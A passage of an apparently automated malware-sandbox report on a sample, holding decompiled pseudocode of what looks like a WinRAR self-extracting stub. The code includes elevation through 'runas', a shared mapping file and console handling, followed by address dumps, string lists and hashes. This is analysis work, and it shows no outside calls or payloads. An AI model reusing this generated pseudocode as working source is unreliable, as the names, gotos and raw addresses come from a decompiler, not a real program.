										E00A1CD9D(_t287, _t320 - 0x1174, 0x800);
										E00A03F8F(_t320 - 0x429c, 0x880, E00A0E0AC(_t287, 0xb9), _t320 - 0x1174);
										_t322 = _t322 + 0x10;
										_push(_t320 - 0x429c);
										_push(0);
										E00A1CE1E();
									} else {
										_push(E00A0E0AC(_t287, 0xba));
										_push(0);
										E00A1CE1E();
										_t314 = 0x800;
									}
									__eflags =  *0xa4a471;
									if( *0xa4a471 == 0) {
										E00A1D4AF(_t320 - 0x2174);
									}
									 *(_t320 - 0xe) = 0;
									_t166 = E00A0A1EF(0, _t320, _t320 - 0x2174, 0, 0);
									_t279 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t302 = E00A1A5B3(_t320 - 0x2174);
										 *(_t320 - 0xd) = _t302;
										__eflags = _t302;
										if(_t302 != 0) {
											L43:
											_t169 =  *(_t320 - 0xe);
											L44:
											_t287 =  *0xa4a471;
											__eflags = _t287;
											if(_t287 != 0) {
												L50:
												__eflags =  *(_t320 - 0xd);
												if( *(_t320 - 0xd) != 0) {
													 *0xa48454 = _t279;
													E00A012E6(_t304, 0x67, 0);
													E00A012E6(_t304, 0x66, 0);
													SetDlgItemTextW(_t304, _t279, E00A0E0AC(_t287, 0xe6)); // executed
													E00A012E6(_t304, 0x69, _t279);
													SetDlgItemTextW(_t304, 0x65, 0xa335b4); // executed
													_t315 = GetDlgItem(_t304, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0xa48438);
													_push(_t304);
													E00A1C085();
													_push(2);
													_push( *0xa48438);
													_push(_t304);
													E00A1C085();
													_push(0xa5dc90);
													_push(_t304);
													 *0xa60cb4 = _t279; // executed
													E00A1D3B2(_t287, __eflags); // executed
													_push(6);
													_push( *0xa48438);
													 *0xa60cb4 = 0;
													_push(_t304);
													E00A1C085();
													__eflags =  *0xa48450;
													if( *0xa48450 == 0) {
														__eflags =  *0xa4845c;
														if( *0xa4845c == 0) {
															__eflags =  *0xa5eca4;
															if( *0xa5eca4 == 0) {
																_push(4);
																_push( *0xa48438);
																_push(_t304); // executed
																E00A1C085(); // executed
															}
														}
													}
													E00A012C8(_t304, _t279, _t279);
													 *0xa48454 =  *0xa48454 & 0x00000000;
													__eflags =  *0xa48454;
													_t182 =  *0xa48450; // 0x1
													goto L75;
												}
												__eflags = _t287;
												_t169 = (_t169 & 0xffffff00 | _t287 != 0x00000000) - 0x00000001 &  *(_t320 - 0xe);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t320 - 0xd) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t320 - 0xd);
													if( *(_t320 - 0xd) != 0) {
														_push(E00A0E0AC(_t287, 0x9a));
														E00A03F8F(_t320 - 0x569c, 0xa00, L"\"%s\"\n%s", _t320 - 0x2174);
														E00A06FBA(0xa40f50, _t279);
														E00A1A195(_t304, _t320 - 0x569c, E00A0E0AC(0xa40f50, 0x96), 0x30);
														 *0xa4845c =  *0xa4845c + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t320 - 0x1174, _t314);
												_t287 = 0xa4c472;
												E00A0EE15(0xa4c472, _t320 - 0x174, 0x80);
												_push(0xa4b472);
												E00A03F8F(_t320 - 0x11cb4, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t320 - 0x2174);
												_t322 = _t322 + 0x14;
												 *(_t320 - 0x58) = 0x3c;
												 *((intOrPtr*)(_t320 - 0x54)) = 0x40;
												 *((intOrPtr*)(_t320 - 0x48)) = _t320 - 0x1174;
												 *((intOrPtr*)(_t320 - 0x44)) = _t320 - 0x11cb4;
												 *(_t320 - 0x50) = _t304;
												 *((intOrPtr*)(_t320 - 0x4c)) = L"runas";
												 *(_t320 - 0x3c) = _t279;
												 *((intOrPtr*)(_t320 - 0x38)) = 0;
												 *((intOrPtr*)(_t320 - 0x40)) = 0xa48468;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t320 - 0x14) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t320 - 0x1c) =  *(_t320 - 0x14);
												} else {
													 *0xa56b80 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E00A10131(0xa56b82, _t231, 0x2000);
													}
													E00A1ADBE(_t287, 0xa5ab82, 7);
													E00A1ADBE(_t287, 0xa5bb82, 2);
													E00A1ADBE(_t287, 0xa5cb82, 0x10);
													 *0xa5dc83 = _t279;
													_t287 = 0xa5db82;
													E00A0EF88(_t279, 0xa5db82, _t320 - 0x174);
													 *(_t320 - 0x1c) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E00A1F750(_t238, 0xa56b80, 0x7104);
													_t322 = _t322 + 0xc;
												}
												_t220 = ShellExecuteExW(_t320 - 0x58);
												E00A0EFD3(_t320 - 0x174, 0x80);
												E00A0EFD3(_t320 - 0x11cb4, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t320 - 0x1c);
													 *(_t320 - 0xd) = _t279;
													goto L64;
												} else {
													 *0xa620ac( *(_t320 - 0x20), 0x2710);
													_t71 = _t320 - 0x18;
													 *_t71 =  *(_t320 - 0x18) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t320 - 0x1c);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t320 - 0x18) + 1;
														 *(_t320 - 0x18) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0xa5eca4 =  *(_t320 - 0x20);
													L64:
													__eflags =  *(_t320 - 0x14);
													if( *(_t320 - 0x14) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t320 - 0x14));
													}
													goto L66;
												}
											}
											__eflags = _t302;
											if(_t302 == 0) {
												goto L52;
											}
											E00A03F8F(_t320 - 0x1174, _t314, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t322 = _t322 + 0x10;
											E00A097B6(_t320 - 0x319c);
											 *(_t320 - 4) =  *(_t320 - 4) & 0x00000000;
											_push(0x11);
											_push(_t320 - 0x1174);
											_t246 = E00A098BE(_t320 - 0x319c);
											 *(_t320 - 0xd) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t320 - 0xe) = _t279;
												}
											}
											_t39 = _t320 - 4;
											 *_t39 =  *(_t320 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E00A097F0(_t320 - 0x319c, _t314); // executed
											_t287 =  *0xa4a471;
											goto L50;
										}
										_t248 = GetLastError();
										_t302 =  *(_t320 - 0xd);
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t279;
										 *(_t320 - 0xe) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t320 - 0xe) = _t279;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t279 = 1;
									_t182 = 1;
									 *0xa48450 = 1;
									L75:
									__eflags =  *0xa4845c;
									if( *0xa4845c <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0xa48451 = _t279;
									SetDlgItemTextW(_t304, _t279, E00A0E0AC(_t287, 0x90));
									_t292 =  *0xa40f50; // 0x0
									__eflags = _t292 - 9;
									if(_t292 != 9) {
										__eflags = _t292 - 3;
										_t189 = ((0 | _t292 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t320 - 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E00A0E0AC(_t292, 0x96);
									E00A1A195(_t304, E00A0E0AC(_t292, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t279 = 1;
							__eflags =  *0xa48452;
							if( *0xa48452 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0xa60cb4;
						if( *0xa60cb4 == 0) {
							goto L23;
						} else {
							__eflags =  *0xa60cb5;
							_t256 = _t149 & 0xffffff00 |  *0xa60cb5 == 0x00000000;
							__eflags = _t256;
							 *0xa60cb5 = _t256;
							_t257 = E00A0E0AC((0 | _t256 != 0x00000000) + 0xe6, (0 | _t256 != 0x00000000) + 0xe6);
							_t279 = 1;
							SetDlgItemTextW(_t304, 1, _t257);
							while(1) {
								__eflags =  *0xa60cb5;
								if( *0xa60cb5 == 0) {
									goto L125;
								}
								__eflags =  *0xa48450;
								if( *0xa48450 != 0) {
									goto L125;
								}
								_t261 = GetMessageW(_t320 - 0x74, 0, 0, 0);
								__eflags = _t261;
								if(_t261 == 0) {
									goto L125;
								} else {
									_t263 = IsDialogMessageW(_t304, _t320 - 0x74);
									__eflags = _t263;
									if(_t263 == 0) {
										TranslateMessage(_t320 - 0x74);
										DispatchMessageW(_t320 - 0x74);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t268 = _t149 - 1;
					__eflags = _t268;
					if(_t268 == 0) {
						_t279 = 1;
						__eflags =  *0xa48454;
						 *0xa48450 = 1;
						if( *0xa48454 == 0) {
							goto L12;
						}
						__eflags =  *0xa4845c;
						if( *0xa4845c != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t268 == 0x65;
					if(_t268 == 0x65) {
						_t272 = E00A01241(_t304, E00A0E0AC(_t287, 0x64), _t320 - 0x1174);
						__eflags = _t272;
						if(_t272 != 0) {
							SetDlgItemTextW(_t304, 0x66, _t320 - 0x1174);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}






















































                                                        0x00a1b170
                                                        0x00a1b170
                                                        0x00a1b175
                                                        0x00a1b17f
                                                        0x00a1b185
                                                        0x00a1b189
                                                        0x00a1b18d
                                                        0x00a1b1a6
                                                        0x00a1b1b0
                                                        0x00a1b1b0
                                                        0x00a1b1b6
                                                        0x00a1b85c
                                                        0x00a1b85d
                                                        0x00a1b862
                                                        0x00a1b869
                                                        0x00a1b86a
                                                        0x00a1b870
                                                        0x00a1b876
                                                        0x00a1b878
                                                        0x00a1b882
                                                        0x00a1b882
                                                        0x00a1b888
                                                        0x00a1b88d
                                                        0x00a1b88f
                                                        0x00a1b89c
                                                        0x00a1b89c
                                                        0x00a1b8a5
                                                        0x00a1b8b8
                                                        0x00a1b8bb
                                                        0x00a1b8cd
                                                        0x00a1b8d5
                                                        0x00a1b8db
                                                        0x00a1b8e3
                                                        0x00a1b8e5
                                                        0x00a1b8e8
                                                        0x00a1b8ed
                                                        0x00a1b8ef
                                                        0x00a1b8ef
                                                        0x00a1b8f7
                                                        0x00a1b8fe
                                                        0x00a1b903
                                                        0x00a1b908
                                                        0x00a1b90d
                                                        0x00a1b912
                                                        0x00a1b913
                                                        0x00a1b91a
                                                        0x00a1b91f
                                                        0x00a1b921
                                                        0x00a1b923
                                                        0x00a1b923
                                                        0x00a1b929
                                                        0x00a1b930
                                                        0x00a1b932
                                                        0x00a1b934
                                                        0x00a1b93a
                                                        0x00a1b93b
                                                        0x00a1b93b
                                                        0x00a1b940
                                                        0x00a1b947
                                                        0x00a1b957
                                                        0x00a1b96a
                                                        0x00a1b96a
                                                        0x00a1b970
                                                        0x00a1b977
                                                        0x00a1ba28
                                                        0x00a1ba28
                                                        0x00a1ba2f
                                                        0x00a1bad8
                                                        0x00a1bad8
                                                        0x00a1badf
                                                        0x00a1bae4
                                                        0x00a1bae4
                                                        0x00a1baea
                                                        0x00a1baf1
                                                        0x00a1baf8
                                                        0x00a1bb02
                                                        0x00a1bb02
                                                        0x00a1bb07
                                                        0x00a1bb0c
                                                        0x00a1bb0e
                                                        0x00a1bb10
                                                        0x00a1bb17
                                                        0x00a1bb19
                                                        0x00a1bb1b
                                                        0x00a1bb1c
                                                        0x00a1bb21
                                                        0x00a1bb22
                                                        0x00a1bb24
                                                        0x00a1bb2e
                                                        0x00a1bb26
                                                        0x00a1bb26
                                                        0x00a1bb26
                                                        0x00a1bb24
                                                        0x00a1bb17
                                                        0x00a1bb34
                                                        0x00a1bb3b
                                                        0x00a1bb4a
                                                        0x00a1bb4a
                                                        0x00000000
                                                        0x00a1bb3b
                                                        0x00a1ba35
                                                        0x00a1ba3c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1ba42
                                                        0x00a1ba49
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1ba4f
                                                        0x00a1ba51
                                                        0x00a1ba56
                                                        0x00a1ba5d
                                                        0x00a1ba5d
                                                        0x00a1ba63
                                                        0x00a1ba6e
                                                        0x00a1ba6e
                                                        0x00a1ba74
                                                        0x00a1ba7f
                                                        0x00a1ba90
                                                        0x00a1baa8
                                                        0x00000000
                                                        0x00a1baa8
                                                        0x00a1ba76
                                                        0x00a1ba7d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1ba7d
                                                        0x00a1ba65
                                                        0x00a1ba6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1baad
                                                        0x00a1baad
                                                        0x00a1baae
                                                        0x00a1baae
                                                        0x00a1bab6
                                                        0x00a1bad0
                                                        0x00a1bad5
                                                        0x00000000
                                                        0x00a1b97d
                                                        0x00a1b97d
                                                        0x00a1b97f
                                                        0x00a1b985
                                                        0x00a1b986
                                                        0x00a1b98b
                                                        0x00a1b990
                                                        0x00a1b992
                                                        0x00a1b994
                                                        0x00a1b99b
                                                        0x00a1b99d
                                                        0x00a1b9b1
                                                        0x00a1b9bc
                                                        0x00a1b9c1
                                                        0x00a1b9c1
                                                        0x00a1b99b
                                                        0x00a1b9c2
                                                        0x00a1b9c8
                                                        0x00a1ba1b
                                                        0x00a1ba1b
                                                        0x00a1ba1c
                                                        0x00a1ba22
                                                        0x00a1ba23
                                                        0x00000000
                                                        0x00a1b9ca
                                                        0x00a1b9cb
                                                        0x00a1b9d1
                                                        0x00a1b9d7
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1b9d9
                                                        0x00a1b9e0
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1b9e2
                                                        0x00a1b9e4
                                                        0x00a1b9ea
                                                        0x00a1b9eb
                                                        0x00a1b9f0
                                                        0x00a1b9f7
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1ba0d
                                                        0x00a1ba13
                                                        0x00a1ba15
                                                        0x00a1b2fb
                                                        0x00a1b2fb
                                                        0x00a1b301
                                                        0x00a1b301
                                                        0x00a1b226
                                                        0x00a1b227
                                                        0x00a1bb50
                                                        0x00a1bb50
                                                        0x00a1bb52
                                                        0x00a1bb58
                                                        0x00a1bb62
                                                        0x00a1bb62
                                                        0x00000000
                                                        0x00a1ba15
                                                        0x00a1b9c8
                                                        0x00a1b977
                                                        0x00a1b1bc
                                                        0x00a1b1bf
                                                        0x00a1b1d3
                                                        0x00a1b1d3
                                                        0x00000000
                                                        0x00a1b1d3
                                                        0x00a1b1c4
                                                        0x00a1b1c4
                                                        0x00a1b1c7
                                                        0x00a1b232
                                                        0x00a1b239
                                                        0x00a1b2d1
                                                        0x00a1b2e0
                                                        0x00a1b2e6
                                                        0x00a1b2ed
                                                        0x00a1b307
                                                        0x00a1b30e
                                                        0x00a1b32a
                                                        0x00a1b32c
                                                        0x00a1b332
                                                        0x00a1b33d
                                                        0x00a1b34f
                                                        0x00a1b34f
                                                        0x00a1b356
                                                        0x00a1b35c
                                                        0x00a1b363
                                                        0x00a1b37d
                                                        0x00a1b391
                                                        0x00a1b39e
                                                        0x00a1b3c1
                                                        0x00a1b3c6
                                                        0x00a1b3cf
                                                        0x00a1b3d0
                                                        0x00a1b3d1
                                                        0x00a1b365
                                                        0x00a1b36f
                                                        0x00a1b370
                                                        0x00a1b371
                                                        0x00a1b376
                                                        0x00a1b376
                                                        0x00a1b3d6
                                                        0x00a1b3dd
                                                        0x00a1b3e6
                                                        0x00a1b3e6
                                                        0x00a1b3f6
                                                        0x00a1b3f9
                                                        0x00a1b400
                                                        0x00a1b401
                                                        0x00a1b403
                                                        0x00a1b41a
                                                        0x00a1b426
                                                        0x00a1b428
                                                        0x00a1b42b
                                                        0x00a1b42d
                                                        0x00a1b444
                                                        0x00a1b444
                                                        0x00a1b447
                                                        0x00a1b447
                                                        0x00a1b44d
                                                        0x00a1b44f
                                                        0x00a1b4be
                                                        0x00a1b4be
                                                        0x00a1b4c2
                                                        0x00a1b702
                                                        0x00a1b708
                                                        0x00a1b712
                                                        0x00a1b724
                                                        0x00a1b72e
                                                        0x00a1b73b
                                                        0x00a1b74a
                                                        0x00a1b74c
                                                        0x00a1b74e
                                                        0x00a1b759
                                                        0x00a1b759
                                                        0x00a1b762
                                                        0x00a1b762
                                                        0x00a1b768
                                                        0x00a1b76a
                                                        0x00a1b770
                                                        0x00a1b771
                                                        0x00a1b776
                                                        0x00a1b778
                                                        0x00a1b77e
                                                        0x00a1b77f
                                                        0x00a1b784
                                                        0x00a1b789
                                                        0x00a1b78a
                                                        0x00a1b790
                                                        0x00a1b795
                                                        0x00a1b797
                                                        0x00a1b79d
                                                        0x00a1b7a4
                                                        0x00a1b7a5
                                                        0x00a1b7aa
                                                        0x00a1b7b1
                                                        0x00a1b7b3
                                                        0x00a1b7ba
                                                        0x00a1b7bc
                                                        0x00a1b7c3
                                                        0x00a1b7c5
                                                        0x00a1b7c7
                                                        0x00a1b7cd
                                                        0x00a1b7ce
                                                        0x00a1b7ce
                                                        0x00a1b7c3
                                                        0x00a1b7ba
                                                        0x00a1b7d6
                                                        0x00a1b7db
                                                        0x00a1b7db
                                                        0x00a1b7e2
                                                        0x00000000
                                                        0x00a1b7e2
                                                        0x00a1b4c8
                                                        0x00a1b4cf
                                                        0x00a1b4cf
                                                        0x00a1b4d2
                                                        0x00a1b4d2
                                                        0x00a1b4d4
                                                        0x00a1b4d8
                                                        0x00a1b4da
                                                        0x00a1b698
                                                        0x00a1b698
                                                        0x00a1b69c
                                                        0x00a1b6ac
                                                        0x00a1b6c5
                                                        0x00a1b6d3
                                                        0x00a1b6ed
                                                        0x00a1b6f2
                                                        0x00a1b6f2
                                                        0x00a1b224
                                                        0x00a1b224
                                                        0x00000000
                                                        0x00a1b224
                                                        0x00a1b4ea
                                                        0x00a1b4fb
                                                        0x00a1b501
                                                        0x00a1b506
                                                        0x00a1b523
                                                        0x00a1b528
                                                        0x00a1b52b
                                                        0x00a1b538
                                                        0x00a1b53f
                                                        0x00a1b548
                                                        0x00a1b560
                                                        0x00a1b563
                                                        0x00a1b56a
                                                        0x00a1b56d
                                                        0x00a1b570
                                                        0x00a1b57d
                                                        0x00a1b57f
                                                        0x00a1b582
                                                        0x00a1b584
                                                        0x00a1b60f
                                                        0x00a1b58a
                                                        0x00a1b58a
                                                        0x00a1b591
                                                        0x00a1b597
                                                        0x00a1b599
                                                        0x00a1b5a6
                                                        0x00a1b5a6
                                                        0x00a1b5b2
                                                        0x00a1b5be
                                                        0x00a1b5ca
                                                        0x00a1b5d5
                                                        0x00a1b5dc
                                                        0x00a1b5e1
                                                        0x00a1b5ff
                                                        0x00a1b602
                                                        0x00a1b607
                                                        0x00a1b607
                                                        0x00a1b616
                                                        0x00a1b62a
                                                        0x00a1b63b
                                                        0x00a1b640
                                                        0x00a1b642
                                                        0x00a1b67c
                                                        0x00a1b67f
                                                        0x00000000
                                                        0x00a1b644
                                                        0x00a1b64c
                                                        0x00a1b652
                                                        0x00a1b652
                                                        0x00a1b652
                                                        0x00a1b656
                                                        0x00a1b659
                                                        0x00a1b659
                                                        0x00a1b65c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1b660
                                                        0x00a1b669
                                                        0x00a1b66a
                                                        0x00a1b66d
                                                        0x00a1b670
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1b670
                                                        0x00a1b675
                                                        0x00a1b682
                                                        0x00a1b682
                                                        0x00a1b686
                                                        0x00a1b689
                                                        0x00a1b692
                                                        0x00a1b692
                                                        0x00000000
                                                        0x00a1b686
                                                        0x00a1b642
                                                        0x00a1b451
                                                        0x00a1b453
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1b469
                                                        0x00a1b46e
                                                        0x00a1b477
                                                        0x00a1b47c
                                                        0x00a1b486
                                                        0x00a1b488
                                                        0x00a1b48f
                                                        0x00a1b494
                                                        0x00a1b497
                                                        0x00a1b499
                                                        0x00a1b49b
                                                        0x00a1b4a1
                                                        0x00a1b4a4
                                                        0x00a1b4a6
                                                        0x00a1b4a6
                                                        0x00a1b4a4
                                                        0x00a1b4a9
                                                        0x00a1b4a9
                                                        0x00a1b4a9
                                                        0x00a1b4b3
                                                        0x00a1b4b8
                                                        0x00000000
                                                        0x00a1b4b8
                                                        0x00a1b42f
                                                        0x00a1b435
                                                        0x00a1b438
                                                        0x00a1b43b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1b43d
                                                        0x00a1b43f
                                                        0x00000000
                                                        0x00a1b405
                                                        0x00a1b405
                                                        0x00a1b40b
                                                        0x00a1b40e
                                                        0x00a1b415
                                                        0x00a1b417
                                                        0x00000000
                                                        0x00a1b417
                                                        0x00a1b410
                                                        0x00a1b413
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1b413
                                                        0x00a1b310
                                                        0x00a1b312
                                                        0x00a1b313
                                                        0x00a1b315
                                                        0x00a1b7e7
                                                        0x00a1b7e7
                                                        0x00a1b7ee
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1b7f4
                                                        0x00a1b7f6
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1b801
                                                        0x00a1b80f
                                                        0x00a1b815
                                                        0x00a1b81b
                                                        0x00a1b81e
                                                        0x00a1b829
                                                        0x00a1b833
                                                        0x00a1b833
                                                        0x00a1b838
                                                        0x00a1b83b
                                                        0x00a1b820
                                                        0x00a1b820
                                                        0x00a1b820
                                                        0x00a1b844
                                                        0x00a1b852
                                                        0x00000000
                                                        0x00a1b852
                                                        0x00a1b30e
                                                        0x00a1b2f1
                                                        0x00a1b2f2
                                                        0x00a1b2f9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1b2f9
                                                        0x00a1b23f
                                                        0x00a1b246
                                                        0x00000000
                                                        0x00a1b24c
                                                        0x00a1b24c
                                                        0x00a1b253
                                                        0x00a1b258
                                                        0x00a1b25a
                                                        0x00a1b269
                                                        0x00a1b271
                                                        0x00a1b274
                                                        0x00a1b2c3
                                                        0x00a1b2c3
                                                        0x00a1b2ca
                                                        0x00a1b2cc
                                                        0x00a1b2cc
                                                        0x00a1b27c
                                                        0x00a1b283
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1b292
                                                        0x00a1b298
                                                        0x00a1b29a
                                                        0x00000000
                                                        0x00a1b2a0
                                                        0x00a1b2a5
                                                        0x00a1b2ab
                                                        0x00a1b2ad
                                                        0x00a1b2b3
                                                        0x00a1b2bd
                                                        0x00a1b2bd
                                                        0x00000000
                                                        0x00a1b2ad
                                                        0x00a1b29a
                                                        0x00000000
                                                        0x00a1b2c3
                                                        0x00a1b246
                                                        0x00a1b1c9
                                                        0x00a1b1c9
                                                        0x00a1b1cc
                                                        0x00a1b207
                                                        0x00a1b208
                                                        0x00a1b20f
                                                        0x00a1b215
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1b217
                                                        0x00a1b21e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1b21e
                                                        0x00a1b1ce
                                                        0x00a1b1d1
                                                        0x00a1b1ea
                                                        0x00a1b1ef
                                                        0x00a1b1f1
                                                        0x00a1b1fd
                                                        0x00a1b1fd
                                                        0x00000000
                                                        0x00a1b1f1
                                                        0x00000000
                                                        0x00a1b1d1
                                                        0x00a1b1a8
                                                        0x00a1b1aa
                                                        0x00000000

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A1B175
                                                          • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                                          • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prologItemTextWindow
                                                        • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                        • API String ID: 810644672-1650746426
                                                        • Opcode ID: 8e46a3b4c3d1a9b58931191b5c664f39033c01e2fc3c6d628e9b778b2158a292
                                                        • Instruction ID: 8c12ccc0cc9f289969107cfb9296c08d712d68dcbd1094e48e5aa5b5276e3873
                                                        • Opcode Fuzzy Hash: 8e46a3b4c3d1a9b58931191b5c664f39033c01e2fc3c6d628e9b778b2158a292
                                                        • Instruction Fuzzy Hash: B242F475954248BEEB21EBF0AD4AFFE7B7CAB56700F000554F641A60D1CBB94A86CB31
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A103AA Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 257 a103aa-a103c9 call a1e630 GetModuleHandleW 260 a103cb-a103e2 GetProcAddress 257->260 261 a1042f-a1068d 257->261 264 a103e4-a103fa 260->264 265 a103fc-a1040c GetProcAddress 260->265 262 a10693-a1069e call a273cd 261->262 263 a1075f-a1078e GetModuleFileNameW call a0be89 call a10131 261->263 262->263 274 a106a4-a106d5 GetModuleFileNameW CreateFileW 262->274 279 a10790-a1079a call a0aee5 263->279 264->265 265->261 266 a1040e-a1042d 265->266 266->261 276 a10753-a1075a CloseHandle 274->276 277 a106d7-a106e5 SetFilePointer 274->277 276->263 277->276 280 a106e7-a10704 ReadFile 277->280 286 a107a7 279->286 287 a1079c-a107a0 call a10360 279->287 280->276 282 a10706-a1072b 280->282 283 a10748-a10751 call a0feb3 282->283 283->276 294 a1072d-a10747 call a10360 283->294 289 a107a9-a107ab 286->289 291 a107a5 287->291 292 a107cd-a107f3 call a0beff GetFileAttributesW 289->292 293 a107ad-a107cb CompareStringW 289->293 291->289 296 a107f5-a107f9 292->296 301 a107fd 292->301 293->292 293->296 294->283 296->279 300 a107fb 296->300 302 a10801-a10803 300->302 301->302 303 a10805 302->303 304 a1083b-a1083d 302->304 307 a10807-a1082d call a0beff GetFileAttributesW 303->307 305 a10843-a1085a call a0bed3 call a0aee5 304->305 306 a1094a-a10954 304->306 317 a108c2-a108f5 call a03f8f AllocConsole 305->317 318 a1085c-a108bd call a10360 * 2 call a0e0ac call a03f8f call a0e0ac call a1a195 305->318 312 a10837 307->312 313 a1082f-a10833 307->313 312->304 313->307 315 a10835 313->315 315->304 323 a10942-a10944 ExitProcess 317->323 324 a108f7-a1093c GetCurrentProcessId AttachConsole call a23883 GetStdHandle WriteConsoleW Sleep FreeConsole 317->324 318->323 324->323
                                                        C-Code - Quality: 71%
                                                        			E00A103AA(void* __edx, CHAR* _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, char _a244, char _a248, short _a752, short _a756, char _a764, short _a768, char _a4844, char _a4848, void _a4856, char _a4860, short _a4864, char _a9148, char _a9156, void _a13256, signed char _a46028) {
				long _v0;
				long _v8;
				char* _t115;
				void* _t123;
				int _t127;
				long _t138;
				int _t164;
